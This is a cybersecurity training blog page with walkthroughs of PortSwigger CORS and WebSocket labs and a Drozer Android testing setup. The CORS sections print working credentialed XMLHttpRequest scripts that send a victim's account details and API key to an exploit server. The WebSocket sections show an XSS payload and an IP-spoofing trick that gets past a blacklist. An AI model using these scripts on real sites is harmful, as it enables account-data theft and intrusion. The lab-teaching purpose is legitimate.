Cybersecurity

Everything You Need to Know About CORS Vulnerabilities

Introduction to CORS

CORS is a security thing in browsers that decides if a website can get stuff from another website. Normally browsers don’t let websites steal info from other sites. But with CORS websites can say it’s fine for certain sites to get their stuff.

If CORS is wrong, attackers could steal info or do stuff for you without you knowing.

What is a Trusted Null Origin Vulnerability?

A trusted null origin vulnerability occurs when a server improperly trusts requests with the Origin: null . This can happen iwhere the server’s CORS policy allows malicious or undefined origins to interact with it. Attackers can exploit this misconfiguration to bypass CORS protections and steal sensitive data, such as API keys or user information.

Lab Description

In this lab, we will exploit a CORS vulnerability with a trusted null origin to extract the administrator’s API key.

Lab URL:  CORS Vulnerability with Trusted Null Origin Lab

Steps to Reproduce the Vulnerability

1. Log in to the application using the provided credentials.

2. Disable intercept in Burp Suite and navigate to “My Account” using Burp’s browser.

3. In Burp Suite’s history, find the /accountDetails request. Note the Access-Control-Allow-Credentials header in the response.

4. Send the request to Burp Repeater, add the header Origin: null, and resubmit it. Observe that the Access-Control-Allow-Origin reflects “null.”

5. Write and host the following HTML exploit script on the provided exploit server:

<script>
var req = new XMLHttpRequest();
req.onload = function() {
document.location = ‘https://exploit-0a61006204ebace580cd8fa5014a00c1.exploit-server.net/’ + req.responseText;
};
req.open(‘GET’, ‘https://0a00000104c1aa31803021e800580091.web-security-academy.net/accountDetails’, true);
req.withCredentials = true;
req.send();
</script>

6. Trigger the exploit and deliver it to the victim.
7. Check the exploit server’s access logs to retrieve the administrator’s API key.

8. Submit the key to solve the lab.

Conclusion

This lab shows how a bad CORS setup trusting the null origin can leak sensitive data. To fix this:

  • Don’t trust the null origin in CORS.
  • Use a strict list of allowed sites.
  • Keep testing CORS to find issues.

By getting CORS right, companies can make their websites safer and protect user data from attackers.

Let’s take another lab to understand CORS

Exploiting CORS Vulnerability with Trusted Insecure Protocols

CORS misconfigurations can allow requests from insecure origins (like HTTP subdomains). This can expose sensitive data when combined with other vulnerabilities, such as XSS.

Lab URL: CORS Vulnerability with Trusted Insecure Protocols

Steps to Reproduce the Vulnerability

1. Log in using Burp’s browser and turn off intercept.

2. Check the /account Details request in the history and observe the Access-Control-Allow-Credentials header.

3. Send the request to Burp Repeater and add the header Origin: http://subdomain.lab-id.

4. Open a product page and click “Check stock.” Notice that data is fetched over an insecure HTTP subdomain.

5. Replace YOUR-LAB-ID with your lab URL and YOUR-EXPLOIT-SERVER-ID with your exploit server ID in the script.

<script> document.location=”http://stock.YOUR-LAB-ID.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open(‘get’,’https://YOUR-LAB-ID.web-security-academy.net/accountDetails’,true); req.withCredentials = true;req.send();function reqListener() {location=’https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key=’%2bthis.responseText; };%3c/script>&storeId=1″ </script>

6. Click View exploit and confirm the API key appears in the URL. Then, click Deliver exploit to victim and access the log on the exploit server.

 

 

Everything You Need to Know About CORS Vulnerabilities Read More »

How to Identify and Prevent WebSocket Vulnerabilities

What is web socket:

A WebSocket is a communication protocol that provides full-duplex, bidirectional communication channels over a single, long-lived connection. Unlike traditional HTTP, which is request-response based, WebSockets allow data to be sent and received continuously in both directions without the overhead of repeatedly opening and closing connections.

What are web socket vulnerabilities:

Insecure WebSocket implementations and insufficient input validation can lead to exploitation, such as cross-site scripting (XSS) or buffer overflows. To mitigate these risks, always use secure WebSocket connections (wss://), authenticate users properly, validate inputs, and implement rate limiting and connection management.

Lets take portswigger labs as a example for better understanding:

Lab url: https://portswigger.net/web-security/websockets/cross-site-websocket-hijacking/lab

Description: This online shop has a live chat feature implemented using WebSockets
Chat messages that you submit are viewed by a support agent in real time.

To solve the lab, use a WebSocket message to trigger an alert() popup in the support
agent’s browser.

Explanation: There is a online shop and it has a live chat feature that iis implemented using websockets , we have to trigger an alert() popup through websocket messages.

Steps to solve:

The live chat feature of the website:

Verifying that the chat feature uses a websocket using burpsuit WebSocket history (make sure to configure your burp to intercept websocket history):

I tried <> these symbols and they were url encoded:

I intercepted the websocket message and replaced the message with the script <img src=1 onerror=’alert(1)’> and alert script was successful.

And we successfully solved the lab
Lets take another example:

Manipulating the WebSocket handshake to exploit vulnerabilities:

Lab url: https://portswigger.net/web-security/websockets/lab-manipulatinghandshake-to-exploit-vulnerabilities

Description: This online shop has a live chat feature implemented using WebSockets. It has an aggressive but flawed XSS filter. To solve the lab, use a WebSocket message to trigger an alert() popup in the support agent’s browser.

Exploitation: We have to exploit live chat feature to trigger an xss alert(). It has a xss filter
but it has flaws.

Steps to solve the lab :
Website’s live chat page :

I tried to insert a javascript payload and it says attack detected and disconnects:

When I tried to reconnect(from the reconnect option in the burp repeter) it says “This address is Blacklisted”:

Now I appende X-Forwarded-for:1.1.1.1 to spoof the ip adrress to reconnect:

And it reconnected :

After reconnecting I tried a obfuscated script and the filter didn’t block it and the lab is solved:

Conclusion : WebSocket vulnerabilities can severely affect the security and performance of real-time applications if not properly addressed. To mitigate these risks, it is essential to implement secure WebSocket connections using wss://, validate and authenticate all WebSocket requests, sanitize incoming data, enforce connection limits, and regularly update WebSocket libraries. By following best practices for security, WebSocket-based applications can provide a robust and secure communication channel for real-time data exchange.

That’s all for websocket labs , Thank you for reading.

How to Identify and Prevent WebSocket Vulnerabilities Read More »

Requirements To Set-Up Android Lab in Windows:-

Python: Install Python on your Windows machine.
Nox Player: Install Nox Player, an Android emulator for Windows.

Download and Configure:-
1. Check Python Installation: Open command prompt and type the following command to check if Python is installed:

“python –version”

2. Install Frida-Tools: Open PowerShell and install Drozer using pip3:
“pip3 install drozer”

3. Verify Drozer Installation: Open command prompt and type the following commands to check if Drozer are installed and working properly:
“drozer –help”

4. Go to the Drozer GitHub repository: https://github.com/WithSecureLabs/drozer-agent/releases/.
5. Download drozer application for android.

6. Right-click on Nox Player and select “Open File Location” to navigate to the Nox Player/bin folder.

7. Open CMD in the Nox Player/bin path.

8. Install the drozer apk on emulator, run this following commands:-
“adb install <drozer-apk>”

9. After installing Drozer, turn on the drozer switch.

10. After this run the following command for connection:
“adb froward tcp:31415 tcp:31415”

11. After this , Run this command for connect with drozer.
“drozer console connect”

>> Here I am will demonstrate Drozer on vulnerable applications like:- Androgoat application.

1. First install the vulnerable applications:-

2. Let’s retrieve package name of all application on android:-
“run app.package.list”

3. Let’s retrieve package name first of the vulnerable application.
“run app.package.list -f androgoat”
-f –> filtering package name

4. Let’s retrieve basic Information of the specific package name:-
“run app.package.info -a owasp.sat.agoat”

5. Now, we will read android manifest.
“run app.package.manifest owasp.sat.agoat”

6. Now we will try to identify the attack surface of the application, run this following command in terminal:-
“run app.package.attacksurface owasp.sat.agoat”

7. Let’s retrieve the exported activity component’s of the application.
“run app.activity.info -a owasp.sat.agoat”

8. Now, Let’s try to exploit android activities. We are successfully exploit the activity.
“run app.activity.start –component owasp.sat.agoat owasp.sat.agoat.AccessControl1ViewActivity”

9. Let’s retrieve the services of android.
“run app.service.info -a owasp.sat.agoat”

10. Let’s retrieve the all broadcast receivers.
“run app.broadcast.info -a owasp.sat.agoat”

Requirements To Set-Up Android Lab in Windows:- Read More »

Subscribe

Enter Your Email to receive relevant messaging tips and examples

Lorcam Securities stands out as a premier provider of cybersecurity training, addressing the issues organizations face in defending against a rapidly changing array of cyber threats.

Quick Link

We offer

Office Address

India Office Address:- B-28, 1ST Floor, Sector-01, Noida, Uttar Pradesh -201301

Facebook X-twitter Youtube Linkedin

© 2025 Lorcram Securities. All rights reserved.

Open chat
Need help?
Hello 👋
Can we help you?